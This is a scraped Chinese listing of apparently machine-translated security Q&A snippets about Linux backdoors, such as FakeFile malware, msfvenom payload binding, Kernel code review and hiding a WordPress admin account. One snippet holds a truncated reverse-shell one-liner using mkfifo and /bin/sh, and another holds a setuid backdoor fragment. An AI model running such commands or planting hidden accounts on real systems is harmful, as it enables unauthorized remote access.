根据Dr.web的说法,有一种名为Linux.BackDoor.FakeFile.1的新linux恶意软件,它可以穿透.pdf、gedit、开放办公室文件。,它可以使用用户权限执行多重恶意函数 (它不需要根特权):
然后搜索隐藏文件,其名称与特洛伊木马程序的文件名相匹配,并将可执行文件替换为可执行文件。例如,如果Linux.BackDoor.FakeFile.1的ELF文件名为AnyName.pdf,则特洛伊木马将搜索名为.AnyName.pdf的隐藏文件,然后使用命令mv替换原始文件。由于恶意软件最近被
浏览 0提问于2016-10-28得票数 0
回答已采纳
Kali Linux是否包含经过审核的软件,该软件旨在帮助安全性,并且基本上不包含任何后门?Kali Linux有一些后门的历史吗?还是允许第三方访问经过审计的系统?
浏览 0提问于2016-10-27得票数 0
回答已采纳
因此,您可以使用msfpayload或msfvenom将有效负载添加到现有的exe中,大多数在线用户似乎使用反向shell。但我想知道您是否可以将您自己设计的自定义exe作为有效负载。例如,我有一个"evil_notepad.exe“,我想添加一个有效负载"showanalert.exe”。打开时,将运行"showanalert.exe“。这似乎是可行的,但却导致程序本身
浏览 0提问于2014-03-29得票数 1
2回答
后门怎么走?
、、、
我研究了一下,我感到惊讶的是,在我扎根之后,把一台Linux机器后门是多么容易。0,0,0);}chown root:root backdoor因此,现在,任何用户都可以使用后门作为/backdoor whoami在获得root等效(NT AUTHORITY\SYSTEM)之后,我如
浏览 0提问于2022-11-09得票数 -1
这大大减少了后门的机会。例如,WiFi设备的驱动程序当然仍然可以隐藏后门,以便从某个神奇的地址接收连接,但是它不能使用这个后门来改变某些进程状态。
我说的对吗?
浏览 0提问于2021-06-14得票数 1
场景:
我用C语言为Linux编写了一个CLI后门和一个CLI控制器。我正在使用Glade和GTK+3为控制器创建一个图形用户界面。我希望控制器(基本上是一个具有反向功能的服务器)始终接受来自后门(具有反向功能的客户端)的连接。同时,我希望将控制器中TextBuffer小部件上编写的命令发送到后门,并将接收到的输出写回后门。
浏览 4提问于2020-06-23得票数 1
3回答
根据我对Linux的简要了解,来自世界各地的开发人员提交的代码将包含在Linux更新中。然后由安全管理员对其进行审查。一旦获得批准,它就会传递给Linux的创始人Linus,以获得他的最终批准。由于所有这些代码都是由世界各地不知名的开发人员提交的,安全管理员如何确保没有向操作系统添加任何后门脚本?不是有1500万行代码吗?操作系统的管理员是否真的理解每一行代码,并确信人们没有提交可能破坏系统的东西,如恶意软件、后门或间谍软件?
浏览 0提问于2018-05-12得票数 7
2回答
我很好奇应该在Windows服务器上查找哪种类型的敏感文件,与Linux相比,Windows服务器容易受到LFI的攻击?。我正在寻找可能的利用后的方法,LFI漏洞的网站是托管在Windows服务器上,而不是Linux。只是想在不使用外部后门或工具(
)的情况下,对LFI进行
浏览 0提问于2019-06-09得票数 1
我想在Wordpress中创建一个管理员用户,然后将其从wordpress仪表板的用户列表中隐藏起来,作为一种隐藏的后门。我不想隐藏所有的管理员,只有一个特定的管理员。
任何帮助都是非常感谢的。
浏览 0提问于2014-01-04得票数 8
1回答
我并不是linux中最聪明的(这就是为什么我买了一个VPS,所以我可以学习),我以为它是某种后门,尽管我宁愿由你们来验证,他们知道我是否应该删除它。这是一个图片:。如果你们能告诉我这是不是后门那就太好了,谢谢!
浏览 3提问于2017-08-15得票数 0
回答已采纳
1回答
从肯·汤普森的图灵奖演讲“信任思考”开始,软件后门的风险就很明显了。当然,这也适用于硬件。
限制我们在这里的软件,什么是真正好的解决方案,以防止后门?由于最近媒体关于国家对全球互联网监控的某些报道,人们对注定要保护IT安全的软件中潜在后门的担忧再次浮出水面,例如在http://www.golem.de/news/prism-skandal-furcht-vor-hintertueren-in-us-software-und-hardware
浏览 0提问于2013-07-03得票数 0
我是Ubuntu的新人。我的第一台笔记本电脑运行了Ubuntu。绝对喜欢它,但我有一个问题,当我开始应用- Ubuntu软件-在哪里我可以浏览或看到编辑的选择,所有的软件在这里审查?我是否需要担心这里列出的潜在恶意软件?
蒂娅!
浏览 0提问于2021-01-03得票数 1
回答已采纳
1回答
就整体安全性而言,AMD仪表板还是英特尔vPro更好?硬件虚拟化硬件-增强的安全性除了AMD是一个开放的标准之外,我不能真正区分这两种技术之间的区别,它们的主要区别和安全问题是什么?
浏览 0提问于2016-10-18得票数 0
1回答
我一直在使用专门的软件或恶意命令进入备份计算机和服务器,这些命令会在目标计算机上产生后门,然后将终端传输到我服务器上的侦听netcat会话。我想知道是否有可能在使用Netcat监听端口的服务器上产生后门。最好是Linux机器。然后说他在等后门在受害者的机器上产卵。受害者会在他的Linux机器上运行一些命令,比如:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1
浏览 0提问于2017-03-14得票数 1
知道了这一点,从安全的角度来看,如何才能将二元水泡作为Linux内核的一部分来运行呢?存在一个内核的无blob版本。这个项目背后的动机似乎主要是意识形态的。二进制blob是否能包含一个rootkit,用于接管或打开后门进入整个系统?怎么能发现这样的后门呢?
浏览 0提问于2013-06-10得票数 8
回答已采纳
1回答
我从scilab.6.0.0网站安装了scilab.6.0.0和后门(我在Application>Module maneger>atom>Technical上找不到)。我移动了后门文件我的家,从scilab命令行我安装了它。-->atomsInstall('/home/user/BackDoor_0.2_5.5.bin.x86_64.linux.tar.gz')
尽管它成功地安装了后门,但是当我重新启动scilab时,我收到了这个后门</em
浏览 12提问于2017-05-30得票数 1
回答已采纳
1回答
我想对Linux中的zip文件进行加密,这样就没有人可以用任何工具打开或解密它。我的意思是使用没有漏洞或后门的加密。GnuPG加密是最好的解决方案吗?
提前谢谢。
浏览 0提问于2017-11-01得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
